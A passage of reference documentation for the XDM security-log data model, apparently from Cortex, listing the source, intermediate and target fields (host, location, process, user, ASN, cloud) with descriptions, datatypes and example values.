Examples XDM_CONST.SCOPE_TYPE_LOCAL, XDM_CONST.SCOPE_TYPE_DOMAIN, XDM_CONST.SCOPE_TYPE_AZURE, XDM_CONST.SCOPE_TYPE_MICROSOFT, XDM_CONST.SCOPE_TYPE_UNKNOWN

Enriched True

xdm.source.location

The source host.

xdm.source.location.country

Description The country of the source host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Japan

Enriched True

xdm.source.location.city

Description The city of the source host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Tokyo

Enriched True

xdm.source.location.continent

Description The continent of the source host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Asia

Enriched True

xdm.source.location.region

Description The region of the source host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Tokyo

Enriched True

xdm.source.location.latitude

Description Latitude coordinate of the source host's location (auto-enriched field).

Datatype Float

Dataclass Scalar

Examples 45.505918

Enriched True

xdm.source.location.longitude

Description Longitude coordinate of the source host's location (auto-enriched field).

Datatype Float

Dataclass Scalar

Examples -73.61483

Enriched True

xdm.source.location.timezone
 Description Timezone in Continent/City format of the source host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Asia/Tokyo

Enriched True

xdm.source.process

The source process.

xdm.source.process.name

Description The name of the source process.

Datatype String

Dataclass Scalar

xdm.source.process.pid

Description The ID of the source process, provided by the operating system.

Datatype Number

Dataclass Scalar

xdm.source.process.identifier

Description The unique ID of the source process, provided by the agent.

Datatype String

Dataclass Scalar

xdm.source.process.command_line

Description The command line that the source process is executing.

Datatype String

Dataclass Scalar

xdm.source.process.causality_id

Description The ID of the root process that triggered the chain that the source process is a part of.

Datatype String

Dataclass Scalar

xdm.source.process.parent_id

Description The ID of the direct parent process that triggered the source process.

Datatype String

Dataclass Scalar

xdm.source.process.integrity_level

Description The mode of operation level in which the source process is running.

Datatype Number

Dataclass Scalar

xdm.source.process.executable

The source process.

xdm.source.process.executable.filename

Description The file name of the source process executable.

Datatype String

Dataclass Scalar

xdm.source.process.executable.path

Description The file path of the source process executable.

Datatype String
 Dataclass Scalar

xdm.source.process.executable.directory

Description The file directory of the source process executable.

Datatype String

Dataclass Scalar

xdm.source.process.executable.extension

Description The file extension of the source process executable.

Datatype String

Dataclass Scalar

xdm.source.process.executable.file_type

Description The file type of the source process executable.

Datatype String

Dataclass Scalar

xdm.source.process.executable.md5

Description The MD5 hash signature for the source process executable content.

Datatype MD5

Dataclass Scalar

xdm.source.process.executable.sha256

Description The SHA256 hash signature for the source process executable content.

Datatype SHA256

Dataclass Scalar

xdm.source.process.executable.is_signed

Description Whether the loaded module of the source process executable is signed.

Datatype Boolean

Dataclass Scalar

Examples True

xdm.source.process.executable.signer

Description The signer of the source process executable.

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.source.process.executable.signature_status

Description The signature status of the source process executable.

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.source.process.executable.size

Description Size in bytes of the source process executable.

Datatype Number

Dataclass Scalar

xdm.source.process.thread_id

Description The thread ID of the source process.

Datatype Number
 Dataclass Scalar

xdm.source.process.is_injected

Description Whether the source process's thread/activity is executed via process injection.

Datatype Boolean

Dataclass Scalar

xdm.source.process.container_id

Description ID of the container that is running the source process.

Datatype String

Dataclass Scalar

xdm.source.application

The source application that initiated the activity

xdm.source.application.name

Description The name of the source application that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.application.version

Description The version of the source application that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.application.publisher

Description The publisher (vendor/company) of the source application that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.application.installation_timestamp

Description The installation time of the source application that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.application.from_appstore

Description Whether the source application that initiated the activity was installed from an application store.

Datatype Boolean

Dataclass Scalar

xdm.source.user_agent

Description The source user-agent.

Datatype String

Dataclass Scalar

xdm.source.ipv4

Description The source IPv4 address of the activity.

Datatype IPv4

Dataclass Scalar

xdm.source.ipv6

Description The source IPv6 address of the activity.

Datatype IPv6

Dataclass Scalar

xdm.source.asn
The source IP address.

xdm.source.asn.as_number

Description The autonomous system number (ASN) of the source IP address (auto-enriched field).

Datatype Number

Dataclass Scalar

Examples 54538

Enriched True

xdm.source.asn.as_name

Description The autonomous system name of the source IP address (auto-enriched field).

Datatype String

Dataclass Scalar

Examples PALO ALTO NETWORKS

Enriched True

xdm.source.asn.isp

Description The autonomous system ISP name of the source IP address.

Datatype String

Dataclass Scalar

xdm.source.asn.domain

Description The autonomous system domain name of the source IP address

Datatype String

Dataclass Scalar

xdm.source.asn.is_proxy

Description Indicates whether or not the the autonomous system of the source IP address is a proxy/VPN address (auto-enriched field).

Datatype Boolean

Dataclass Scalar

Enriched True

xdm.source.is_internal_ip

Description Whether the source IP address is internal (auto-enriched field).

Datatype Boolean

Dataclass Scalar

Enriched True

xdm.source.port

Description The source port.

Datatype Number

Dataclass Scalar

xdm.source.sent_bytes

Description The amount of bytes transmitted by the source host.

Datatype Number

Dataclass Scalar

xdm.source.sent_packets

Description The amount of packets transmitted by the source host.

Datatype Number

Dataclass Scalar

xdm.source.interface
 Description The source interface address (usually the MAC address).

Datatype String

Dataclass Scalar

xdm.source.zone

Description The region/zone of the source host.

Datatype String

Dataclass Scalar

xdm.source.subnet

Description The subnet of the source IP address, in CIDR notation.

Datatype String

Dataclass Scalar

Examples 198.51.100.0/22, 2001:db8::/48

xdm.source.vlan

Description The VLAN of the source host.

Datatype Number

Dataclass Scalar

xdm.source.cloud

cloud specific information

xdm.source.cloud.provider

Description The cloud provider.

Datatype XDM_CONST.CLOUD_PROVIDER

Dataclass Scalar

Examples XDM_CONST.CLOUD_PROVIDER_AWS, XDM_CONST.CLOUD_PROVIDER_GCP, XDM_CONST.CLOUD_PROVIDER_AZURE, XDM_CONST.CLOUD_PROVIDER_ALIBABA, XDM_CONST.CLOUD_PROVIDER_ON_PREM

xdm.source.cloud.geo_region

Description The cloud provider's cloud geo region name.

Datatype String

Dataclass Scalar

Examples APAC, NORTH_AMERICA, EUROPE

xdm.source.cloud.region

Description The cloud provider's cloud region name.

Datatype String

Dataclass Scalar

Examples us-east-2, eu-west-2, me-south-1

xdm.source.cloud.zone

Description The cloud zone/sub region within a certain region in the cloud provider.

Datatype String

Dataclass Scalar

Examples us-east-1a

xdm.source.cloud.project

Description The project name in which the log was reported.

Datatype String

Dataclass Scalar

xdm.source.cloud.project_hierarchy

Description The project's parent folders / organization unit.

 Datatype String

Dataclass Array

Examples ['Palo Alto Networks', 'Cortex Analytics', 'dev']

xdm.source.cloud.project_id

Description The project id in which the log was reported.

Datatype String

Dataclass Scalar

5.4 | xdm.intermediate
Information about intermediate entity, such as NAT/VPN/PROXY

xdm.intermediate.host

The intermediate device that handled the activity.

xdm.intermediate.host.hostname

Description The host name of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.host.os_family

Description The operating system of the intermediate device that handled the activity.

Datatype XDM_CONST.OS_FAMILY

Dataclass Scalar

Examples XDM_CONST.OS_FAMILY_WINDOWS, XDM_CONST.OS_FAMILY_MACOS, XDM_CONST.OS_FAMILY_LINUX, XDM_CONST.OS_FAMILY_ANDROID, XDM_CONST.OS_FAMILY_IOS

xdm.intermediate.host.os

Description The specific operating system of the intermediate device that handled the activity, including version.

Datatype String

Dataclass Scalar

xdm.intermediate.host.fqdn

Description The fully-qualified domain name (FQDN) of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.host.device_category

Description The device category of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

Examples Infusion System, ATM Machine, Personal Computer, 3D Printer

xdm.intermediate.host.device_model

Description The device model of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

Examples iPad, PA-3200, ThinkPad E14, e2-highmem-8, t2.micro

xdm.intermediate.host.device_id

Description The unique device ID of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.host.ipv4_addresses

Description The IPv4 addresses of the intermediate device that handled the activity.
 Datatype IPv4

Dataclass Array

xdm.intermediate.host.ipv6_addresses

Description The IPv6 addresses of the intermediate device that handled the activity.

Datatype IPv6

Dataclass Array

xdm.intermediate.host.ipv4_public_addresses

Description The IPv4 public addresses of the intermediate device that handled the activity.

Datatype IPv4

Dataclass Array

xdm.intermediate.host.ipv6_public_addresses

Description The IPv6 public addresses of the intermediate device that handled the activity.

Datatype IPv6

Dataclass Array

xdm.intermediate.host.mac_addresses

Description The MAC addresses of the intermediate device that handled the activity.

Datatype String

Dataclass Array

xdm.intermediate.host.manufacturer

Description The device manufacturer of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.host.hardware_uuid

Description The unique hardware manufacturing ID of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.host.boot_time

Description The last known start up time of the intermediate device that handled the activity.

Datatype Timestamp

Dataclass Scalar

xdm.intermediate.host.image

Description The image/runtime name/ID of the intermediate device that handled the activity.

Datatype String

Dataclass Scalar

Examples ami-19231, python3.9, nodejs14.x

xdm.intermediate.host.memory

Description The memory capacity size in bytes of the intermediate device that handled the activity.

Datatype Number

Dataclass Scalar

xdm.intermediate.location

The intermediate device.

xdm.intermediate.location.country

Description The country of the intermediate device (auto-enriched field).

Datatype String
 Dataclass Scalar

Examples Japan

Enriched True

xdm.intermediate.location.city

Description The city of the intermediate device (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Tokyo

Enriched True

xdm.intermediate.location.continent

Description The continent of the intermediate device (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Asia

Enriched True

xdm.intermediate.location.region

Description The region of the intermediate device (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Tokyo

Enriched True

xdm.intermediate.location.latitude

Description Latitude coordinate of the intermediate device's location (auto-enriched field).

Datatype Float

Dataclass Scalar

Examples 45.505918

Enriched True

xdm.intermediate.location.longitude

Description Longitude coordinate of the intermediate device's location (auto-enriched field).

Datatype Float

Dataclass Scalar

Examples -73.61483

Enriched True

xdm.intermediate.location.timezone

Description Timezone in Continent/City format of the intermediate device (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Asia/Tokyo

Enriched True

xdm.intermediate.agent

The agent on the intermediate device.

xdm.intermediate.agent.identifier

Description The ID of the agent on the intermediate device.

 Datatype String

Dataclass Scalar

xdm.intermediate.agent.type

Description The type of the agent on the intermediate device

Datatype XDM_CONST.AGENT_TYPE

Dataclass Scalar

Examples XDM_CONST.AGENT_TYPE_REGULAR, XDM_CONST.AGENT_TYPE_COLLECTOR, XDM_CONST.AGENT_TYPE_VDI, XDM_CONST.AGENT_TYPE_CLOUD

xdm.intermediate.agent.version

Description The version of the agent on the intermediate device.

Datatype String

Dataclass Scalar

xdm.intermediate.agent.content_version

Description The content version of the agent on the intermediate device.

Datatype String

Dataclass Scalar

xdm.intermediate.agent.installation_time

Description The installation time of the agent on the intermediate device.

Datatype Timestamp

Dataclass Scalar

xdm.intermediate.user

The intermediate user.

xdm.intermediate.user.identifier

Description The ID of the user, such as GUID, SID or any other ID that uniquely identifies the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.username

Description The user name used for identification of the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.user_type

Description The type of the intermediate user.

Datatype XDM_CONST.USER_TYPE

Dataclass Scalar

Examples XDM_CONST.USER_TYPE_REGULAR, XDM_CONST.USER_TYPE_SERVICE_ACCOUNT, XDM_CONST.USER_TYPE_MACHINE_ACCOUNT

xdm.intermediate.user.first_name

Description The first name of the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.last_name

Description The last name of the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.middle_name

Description The middle name of the intermediate user.

 Datatype String

Dataclass Scalar

xdm.intermediate.user.employee_id

Description The employee ID of the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.badge_id

Description The work badge ID of the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.ou

Description The organization unit of the intermediate user.

Datatype String

Dataclass Scalar

xdm.intermediate.user.domain

Description The domain to which the intermediate user belongs.

Datatype String

Dataclass Scalar

xdm.intermediate.user.is_password_changeable

Description Whether the password of the intermediate user is changeable.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.user.is_password_expired

Description Whether the password of the intermediate user has expired.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.user.is_password_required

Description Whether the password of the intermediate user is required.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.user.is_disabled

Description Whether the intermediate user is disabled.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.user.groups

Description The groups or roles to which the intermediate user belongs.

Datatype String

Dataclass Array

xdm.intermediate.user.netbios_domain

Description The subdomain of the intermediate user's DNS domain name. See https://docs.microsoft.com/en-us/exchange/disjoint-namespace-scenarios-exchange-2013-help#dns-and-netbios-domain-names (auto-enriched field).

Datatype String

Dataclass Scalar

Examples mycompany
 Enriched True

xdm.intermediate.user.sam_account_name

Description The logon name of the intermediate user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#samaccountname (auto-enriched field).

Datatype String

Dataclass Scalar

Examples jondoe

Enriched True

xdm.intermediate.user.upn

Description The principal name of the intermediate user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#userprincipalname (auto-enriched field).

Datatype String

Dataclass Scalar

Examples [email protected]

Enriched True

xdm.intermediate.user.identity_type

Description The identity type of the intermediate user (auto-enriched field).

Datatype XDM_CONST.IDENTITY_TYPE

Dataclass Scalar

Examples XDM_CONST.IDENTITY_TYPE_MACHINE, XDM_CONST.IDENTITY_TYPE_USER, XDM_CONST.IDENTITY_TYPE_BUILTIN, XDM_CONST.IDENTITY_TYPE_VIRTUAL, XDM_CONST.IDENTITY_TYPE_UNKNOWN

Enriched True

xdm.intermediate.user.scope

Description The scope of the intermediate user (auto-enriched field).

Datatype XDM_CONST.SCOPE_TYPE

Dataclass Scalar

Examples XDM_CONST.SCOPE_TYPE_LOCAL, XDM_CONST.SCOPE_TYPE_DOMAIN, XDM_CONST.SCOPE_TYPE_AZURE, XDM_CONST.SCOPE_TYPE_MICROSOFT, XDM_CONST.SCOPE_TYPE_UNKNOWN

Enriched True

xdm.intermediate.process

The intermediate process.

xdm.intermediate.process.name

Description The name of the intermediate process.

Datatype String

Dataclass Scalar

xdm.intermediate.process.pid

Description The ID of the intermediate process, provided by the operating system.

Datatype Number

Dataclass Scalar

xdm.intermediate.process.identifier

Description The unique ID of the intermediate process, provided by the agent.

Datatype String

Dataclass Scalar

xdm.intermediate.process.command_line

Description The command line that the intermediate process is executing.

Datatype String

Dataclass Scalar

xdm.intermediate.process.causality_id
 Description The ID of the root process that triggered the chain that the intermediate process is a part of.

Datatype String

Dataclass Scalar

xdm.intermediate.process.parent_id

Description The ID of the direct parent process that triggered the intermediate process.

Datatype String

Dataclass Scalar

xdm.intermediate.process.integrity_level

Description The mode of operation level in which the intermediate process is running.

Datatype Number

Dataclass Scalar

xdm.intermediate.process.executable

The intermediate process.

xdm.intermediate.process.executable.filename

Description The file name of the intermediate process executable.

Datatype String

Dataclass Scalar

xdm.intermediate.process.executable.path

Description The file path of the intermediate process executable.

Datatype String

Dataclass Scalar

xdm.intermediate.process.executable.directory

Description The file directory of the intermediate process executable.

Datatype String

Dataclass Scalar

xdm.intermediate.process.executable.extension

Description The file extension of the intermediate process executable.

Datatype String

Dataclass Scalar

xdm.intermediate.process.executable.file_type

Description The file type of the intermediate process executable.

Datatype String

Dataclass Scalar

xdm.intermediate.process.executable.md5

Description The MD5 hash signature for the intermediate process executable content.

Datatype MD5

Dataclass Scalar

xdm.intermediate.process.executable.sha256

Description The SHA256 hash signature for the intermediate process executable content.

Datatype SHA256

Dataclass Scalar

xdm.intermediate.process.executable.is_signed

Description Whether the loaded module of the intermediate process executable is signed.

Datatype Boolean
 Dataclass Scalar

Examples True

xdm.intermediate.process.executable.signer

Description The signer of the intermediate process executable.

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.intermediate.process.executable.signature_status

Description The signature status of the intermediate process executable.

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.intermediate.process.executable.size

Description Size in bytes of the intermediate process executable.

Datatype Number

Dataclass Scalar

xdm.intermediate.process.thread_id

Description The thread ID of the intermediate process.

Datatype Number

Dataclass Scalar

xdm.intermediate.process.is_injected

Description Whether the intermediate process's thread/activity is executed via process injection.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.process.container_id

Description ID of the container that is running the intermediate process.

Datatype String

Dataclass Scalar

xdm.intermediate.user_agent

Description The user-agent of the intermediate device.

Datatype String

Dataclass Scalar

xdm.intermediate.application

The intermediate application that handled the activity.

xdm.intermediate.application.name

Description The name of the intermediate application that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.application.version

Description The version of the intermediate application that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.application.publisher

Description The publisher (vendor/company) of the intermediate application that handled the activity.
 Datatype String

Dataclass Scalar

xdm.intermediate.application.installation_timestamp

Description The installation time of the intermediate application that handled the activity.

Datatype String

Dataclass Scalar

xdm.intermediate.application.from_appstore

Description Whether the intermediate application that handled the activity was installed from an application store.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.ipv4

Description The intermediate IPv4 address of the activity.

Datatype IPv4

Dataclass Scalar

xdm.intermediate.ipv6

Description The intermediate IPv6 address of the activity.

Datatype IPv6

Dataclass Scalar

xdm.intermediate.asn

The intermediate IP address.

xdm.intermediate.asn.as_number

Description The autonomous system number (ASN) of the intermediate IP address (auto-enriched field).

Datatype Number

Dataclass Scalar

Examples 54538

Enriched True

xdm.intermediate.asn.as_name

Description The autonomous system name of the intermediate IP address (auto-enriched field).

Datatype String

Dataclass Scalar

Examples PALO ALTO NETWORKS

Enriched True

xdm.intermediate.asn.isp

Description The autonomous system ISP name of the intermediate IP address.

Datatype String

Dataclass Scalar

xdm.intermediate.asn.domain

Description The autonomous system domain name of the intermediate IP address

Datatype String

Dataclass Scalar

xdm.intermediate.asn.is_proxy

Description Indicates whether or not the the autonomous system of the intermediate IP address is a proxy/VPN address (auto-enriched field).

Datatype Boolean

Dataclass Scalar
 Enriched True

xdm.intermediate.is_internal_ip

Description Whether the intermediate IP address is internal (auto-enriched field).

Datatype Boolean

Dataclass Scalar

Enriched True

xdm.intermediate.port

Description The intermediate port.

Datatype Number

Dataclass Scalar

xdm.intermediate.cloud

cloud specific information

xdm.intermediate.cloud.provider

Description The cloud provider.

Datatype XDM_CONST.CLOUD_PROVIDER

Dataclass Scalar

Examples XDM_CONST.CLOUD_PROVIDER_AWS, XDM_CONST.CLOUD_PROVIDER_GCP, XDM_CONST.CLOUD_PROVIDER_AZURE, XDM_CONST.CLOUD_PROVIDER_ALIBABA, XDM_CONST.CLOUD_PROVIDER_ON_PREM

xdm.intermediate.cloud.geo_region

Description The cloud provider's cloud geo region name.

Datatype String

Dataclass Scalar

Examples APAC, NORTH_AMERICA, EUROPE

xdm.intermediate.cloud.region

Description The cloud provider's cloud region name.

Datatype String

Dataclass Scalar

Examples us-east-2, eu-west-2, me-south-1

xdm.intermediate.cloud.zone

Description The cloud zone/sub region within a certain region in the cloud provider.

Datatype String

Dataclass Scalar

Examples us-east-1a

xdm.intermediate.cloud.project

Description The project name in which the log was reported.

Datatype String

Dataclass Scalar

xdm.intermediate.cloud.project_hierarchy

Description The project's parent folders / organization unit.

Datatype String

Dataclass Array

Examples ['Palo Alto Networks', 'Cortex Analytics', 'dev']

xdm.intermediate.cloud.project_id

Description The project id in which the log was reported.

Datatype String
 Dataclass Scalar

xdm.intermediate.is_proxy

Description Whether the intermediate device is a proxy.

Datatype Boolean

Dataclass Scalar

xdm.intermediate.is_nat

Description Whether the intermediate device is applying NAT.

Datatype Boolean

Dataclass Scalar

5.5 | xdm.target
Information about the target of the activity

xdm.target.host

The target host of the activity.

xdm.target.host.hostname

Description The host name of the target host of the activity.

Datatype String

Dataclass Scalar

xdm.target.host.os_family

Description The operating system of the target host of the activity.

Datatype XDM_CONST.OS_FAMILY

Dataclass Scalar

Examples XDM_CONST.OS_FAMILY_WINDOWS, XDM_CONST.OS_FAMILY_MACOS, XDM_CONST.OS_FAMILY_LINUX, XDM_CONST.OS_FAMILY_ANDROID, XDM_CONST.OS_FAMILY_IOS

xdm.target.host.os

Description The specific operating system of the target host of the activity, including version.

Datatype String

Dataclass Scalar

xdm.target.host.fqdn

Description The fully-qualified domain name (FQDN) of the target host of the activity.

Datatype String

Dataclass Scalar

xdm.target.host.device_category

Description The device category of the target host of the activity.

Datatype String

Dataclass Scalar

Examples Infusion System, ATM Machine, Personal Computer, 3D Printer

xdm.target.host.device_model

Description The device model of the target host of the activity.

Datatype String

Dataclass Scalar

Examples iPad, PA-3200, ThinkPad E14, e2-highmem-8, t2.micro

xdm.target.host.device_id

Description The unique device ID of the target host of the activity.

Datatype String

Dataclass Scalar
xdm.target.host.ipv4_addresses

Description The IPv4 addresses of the target host of the activity.

Datatype IPv4

Dataclass Array

xdm.target.host.ipv6_addresses

Description The IPv6 addresses of the target host of the activity.

Datatype IPv6

Dataclass Array

xdm.target.host.ipv4_public_addresses

Description The IPv4 public addresses of the target host of the activity.

Datatype IPv4

Dataclass Array

xdm.target.host.ipv6_public_addresses

Description The IPv6 public addresses of the target host of the activity.

Datatype IPv6

Dataclass Array

xdm.target.host.mac_addresses

Description The MAC addresses of the target host of the activity.

Datatype String

Dataclass Array

xdm.target.host.manufacturer

Description The device manufacturer of the target host of the activity.

Datatype String

Dataclass Scalar

xdm.target.host.hardware_uuid

Description The unique hardware manufacturing ID of the target host of the activity.

Datatype String

Dataclass Scalar

xdm.target.host.boot_time

Description The last known start up time of the target host of the activity.

Datatype Timestamp

Dataclass Scalar

xdm.target.host.image

Description The image/runtime name/ID of the target host of the activity.

Datatype String

Dataclass Scalar

Examples ami-19231, python3.9, nodejs14.x

xdm.target.host.memory

Description The memory capacity size in bytes of the target host of the activity.

Datatype Number

Dataclass Scalar

xdm.target.agent

The agent on the target host.

xdm.target.agent.identifier
 Description The ID of the agent on the target host.

Datatype String

Dataclass Scalar

xdm.target.agent.type

Description The type of the agent on the target host

Datatype XDM_CONST.AGENT_TYPE

Dataclass Scalar

Examples XDM_CONST.AGENT_TYPE_REGULAR, XDM_CONST.AGENT_TYPE_COLLECTOR, XDM_CONST.AGENT_TYPE_VDI, XDM_CONST.AGENT_TYPE_CLOUD

xdm.target.agent.version

Description The version of the agent on the target host.

Datatype String

Dataclass Scalar

xdm.target.agent.content_version

Description The content version of the agent on the target host.

Datatype String

Dataclass Scalar

xdm.target.agent.installation_time

Description The installation time of the agent on the target host.

Datatype Timestamp

Dataclass Scalar

xdm.target.user

The target user.

xdm.target.user.identifier

Description The ID of the user, such as GUID, SID or any other ID that uniquely identifies the target user.

Datatype String

Dataclass Scalar

xdm.target.user.username

Description The user name used for identification of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.user_type

Description The type of the target user.

Datatype XDM_CONST.USER_TYPE

Dataclass Scalar

Examples XDM_CONST.USER_TYPE_REGULAR, XDM_CONST.USER_TYPE_SERVICE_ACCOUNT, XDM_CONST.USER_TYPE_MACHINE_ACCOUNT

xdm.target.user.first_name

Description The first name of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.last_name

Description The last name of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.middle_name
 Description The middle name of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.employee_id

Description The employee ID of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.badge_id

Description The work badge ID of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.ou

Description The organization unit of the target user.

Datatype String

Dataclass Scalar

xdm.target.user.domain

Description The domain to which the target user belongs.

Datatype String

Dataclass Scalar

xdm.target.user.is_password_changeable

Description Whether the password of the target user is changeable.

Datatype Boolean

Dataclass Scalar

xdm.target.user.is_password_expired

Description Whether the password of the target user has expired.

Datatype Boolean

Dataclass Scalar

xdm.target.user.is_password_required

Description Whether the password of the target user is required.

Datatype Boolean

Dataclass Scalar

xdm.target.user.is_disabled

Description Whether the target user is disabled.

Datatype Boolean

Dataclass Scalar

xdm.target.user.groups

Description The groups or roles to which the target user belongs.

Datatype String

Dataclass Array

xdm.target.user.netbios_domain

Description The subdomain of the target user's DNS domain name. See https://docs.microsoft.com/en-us/exchange/disjoint-namespace-scenarios-exchange-2013-help#dns-and-netbios-domain-names (auto-enriched field).

Datatype String

Dataclass Scalar
 Examples mycompany

Enriched True

xdm.target.user.sam_account_name

Description The logon name of the target user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#samaccountname (auto-enriched field).

Datatype String

Dataclass Scalar

Examples jondoe

Enriched True

xdm.target.user.upn

Description The principal name of the target user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#userprincipalname (auto-enriched field).

Datatype String

Dataclass Scalar

Examples [email protected]

Enriched True

xdm.target.user.identity_type

Description The identity type of the target user (auto-enriched field).

Datatype XDM_CONST.IDENTITY_TYPE

Dataclass Scalar

Examples XDM_CONST.IDENTITY_TYPE_MACHINE, XDM_CONST.IDENTITY_TYPE_USER, XDM_CONST.IDENTITY_TYPE_BUILTIN, XDM_CONST.IDENTITY_TYPE_VIRTUAL, XDM_CONST.IDENTITY_TYPE_UNKNOWN

Enriched True

xdm.target.user.scope

Description The scope of the target user (auto-enriched field).

Datatype XDM_CONST.SCOPE_TYPE

Dataclass Scalar

Examples XDM_CONST.SCOPE_TYPE_LOCAL, XDM_CONST.SCOPE_TYPE_DOMAIN, XDM_CONST.SCOPE_TYPE_AZURE, XDM_CONST.SCOPE_TYPE_MICROSOFT, XDM_CONST.SCOPE_TYPE_UNKNOWN

Enriched True

xdm.target.location

The target host.

xdm.target.location.country

Description The country of the target host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Japan

Enriched True

xdm.target.location.city

Description The city of the target host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Tokyo

Enriched True

xdm.target.location.continent

Description The continent of the target host (auto-enriched field).

Datatype String
 Dataclass Scalar

Examples Asia

Enriched True

xdm.target.location.region

Description The region of the target host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Tokyo

Enriched True

xdm.target.location.latitude

Description Latitude coordinate of the target host's location (auto-enriched field).

Datatype Float

Dataclass Scalar

Examples 45.505918

Enriched True

xdm.target.location.longitude

Description Longitude coordinate of the target host's location (auto-enriched field).

Datatype Float

Dataclass Scalar

Examples -73.61483

Enriched True

xdm.target.location.timezone

Description Timezone in Continent/City format of the target host (auto-enriched field).

Datatype String

Dataclass Scalar

Examples Asia/Tokyo

Enriched True

xdm.target.process

The target process.

xdm.target.process.name

Description The name of the target process.

Datatype String

Dataclass Scalar

xdm.target.process.pid

Description The ID of the target process, provided by the operating system.

Datatype Number

Dataclass Scalar

xdm.target.process.identifier

Description The unique ID of the target process, provided by the agent.

Datatype String

Dataclass Scalar

xdm.target.process.command_line

Description The command line that the target process is executing.

Datatype String
 Dataclass Scalar

xdm.target.process.causality_id

Description The ID of the root process that triggered the chain that the target process is a part of.

Datatype String

Dataclass Scalar

xdm.target.process.parent_id

Description The ID of the direct parent process that triggered the target process.

Datatype String

Dataclass Scalar

xdm.target.process.integrity_level

Description The mode of operation level in which the target process is running.

Datatype Number

Dataclass Scalar

xdm.target.process.executable

The target process.

xdm.target.process.executable.filename

Description The file name of the target process executable.

Datatype String

Dataclass Scalar

xdm.target.process.executable.path

Description The file path of the target process executable.

Datatype String

Dataclass Scalar

xdm.target.process.executable.directory

Description The file directory of the target process executable.

Datatype String

Dataclass Scalar

xdm.target.process.executable.extension

Description The file extension of the target process executable.

Datatype String

Dataclass Scalar

xdm.target.process.executable.file_type

Description The file type of the target process executable.

Datatype String

Dataclass Scalar

xdm.target.process.executable.md5

Description The MD5 hash signature for the target process executable content.

Datatype MD5

Dataclass Scalar

xdm.target.process.executable.sha256

Description The SHA256 hash signature for the target process executable content.

Datatype SHA256

Dataclass Scalar

xdm.target.process.executable.is_signed
 Description Whether the loaded module of the target process executable is signed.

Datatype Boolean

Dataclass Scalar

Examples True

xdm.target.process.executable.signer

Description The signer of the target process executable.

Datatype String

Dataclass Scalar

Examples Microsoft Corporation

xdm.target.process.executable.signature_status

Description The signature status of the target process executable.

Datatype XDM_CONST.SIGNATURE_STATUS

Dataclass Scalar

Examples XDM_CONST.SIGNATURE_STATUS_UNSIGNED, XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID, XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED, XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN

xdm.target.process.executable.size

Description Size in bytes of the target process executable.

Datatype Number

Dataclass Scalar

xdm.target.process.thread_id

Description The thread ID of the target process.

Datatype Number

Dataclass Scalar

xdm.target.process.is_injected

Description Whether the target process's thread/activity is executed via process injection.

Datatype Boolean

Dataclass Scalar

xdm.target.process.container_id

